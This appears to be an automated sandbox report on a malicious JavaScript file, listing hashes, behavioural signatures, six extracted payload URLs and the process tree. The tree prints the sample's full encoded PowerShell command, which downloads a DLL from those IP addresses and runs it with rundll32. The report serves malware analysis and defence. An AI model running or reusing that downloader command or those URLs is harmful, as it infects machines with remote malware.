Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
22/03/2023, 17:31
Static task
static1
Behavioral task
behavioral1
Sample
Nt_fa24628e-573c-423d-8c6a-8b2fb5f5c75b-ysA.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
Nt_fa24628e-573c-423d-8c6a-8b2fb5f5c75b-ysA.js
Resource
win10v2004-20230220-en
General
-
Target
Nt_fa24628e-573c-423d-8c6a-8b2fb5f5c75b-ysA.js
-
Size
49KB
-
MD5
30fc96e1b14e130e2413f6032960968d
-
SHA1
576f50fc1f64a07f8cd2abd197fe009c484d7ef0
-
SHA256
cdf04ce70a7d1303b77cfa25eae0d0e9b114bdec69c15774bfb6745319dfda6d
-
SHA512
0aec7df88677b9f8828c2cd7e842eeeac9b2b8bcd62f56c47fe0f5373e4b16a6c80fade178883861de9d189e7733ed968a14e9cfb0fdbbafd7b332b689b8e39f
-
SSDEEP
768:4tblGvwyCadXP1Q9q1uvvIAY7qyXRgHS7VInm45UHDuiOa7S6sX5WCYH:4tbovw1adfNQv2KcVDuilcPYH
Malware Config
Extracted
http://203.96.177.121/FIvB5lhB.dathttp://195.20.17.142/FIvB5lhB.dathttp://185.231.204.114/FIvB5lhB.dathttp://87.236.146.162/FIvB5lhB.dathttp://151.80.5.50/FIvB5lhB.dathttp://139.180.209.206/FIvB5lhB.dat
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 864 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1696 wrote to memory of 864 1696 wscript.exe 28 PID 1696 wrote to memory of 864 1696 wscript.exe 28 PID 1696 wrote to memory of 864 1696 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Nt_fa24628e-573c-423d-8c6a-8b2fb5f5c75b-ysA.js1⤵
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANAA7ACQAZQBuAGQAZQBhAHYAbwB1AHIAZQByAFQAaABpAG8AYQBuAHQAaQBtAG8AbgBpAGEAdABlACAAPQAgACgAIgBoAHQAdABwADoALwAvADIAMAAzAC4AOQA2AC4AMQA3ADcALgAxADIAMQAvAEYASQB2AEIANQBsAGgAQgAuAGQAYQB0AGgAdAB0AHAAOgAvAC8AMQA5ADUALgAyADAALgAxADcALgAxADQAMgAvAEYASQB2AEIANQBsAGgAQgAuAGQAYQB0AGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMAMQAuADIAMAA0AC4AMQAxADQALwBGAEkAdgBCADUAbABoAEIALgBkAGEAdABoAHQAdABwADoALwAvADgANwAuADIAMwA2AC4AMQA0ADYALgAxADYAMgAvAEYASQB2AEIANQBsAGgAQgAuAGQAYQB0AGgAdAB0AHAAOgAvAC8AMQA1ADEALgA4ADAALgA1AC4ANQAwAC8ARgBJAHYAQgA1AGwAaABCAC4AZABhAHQAaAB0AHQAcAA6AC8ALwAxADMAOQAuADEAOAAwAC4AMgAwADkALgAyADAANgAvAEYASQB2AEIANQBsAGgAQgAuAGQAYQB0ACIAKQAuAHMAcABsAGkAdAAoACIALAAiACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEkAbQBwAHUAdAByAGUAcwBjAGkAYgBsAGUAIABpAG4AIAAkAGUAbgBkAGUAYQB2AG8AdQByAGUAcgBUAGgAaQBvAGEAbgB0AGkAbQBvAG4AaQBhAHQAZQApACAAewB0AHIAeQAgAHsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABJAG0AcAB1AHQAcgBlAHMAYwBpAGIAbABlACAALQBUAGkAbQBlAG8AdQB0AFMAZQBjACAAMgAwACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABtAGEAZwBpAGEAbgBpAHMAbQBGAHIAbwBuAGQAbwBzAGUALgBkAGwAbAA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUABcAG0AYQBnAGkAYQBuAGkAcwBtAEYAcgBvAG4AZABvAHMAZQAuAGQAbABsACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAG0AYQBnAGkAYQBuAGkAcwBtAEYAcgBvAG4AZABvAHMAZQAuAGQAbABsACwARwBMADcAMAA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADQAOwB9AH0A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-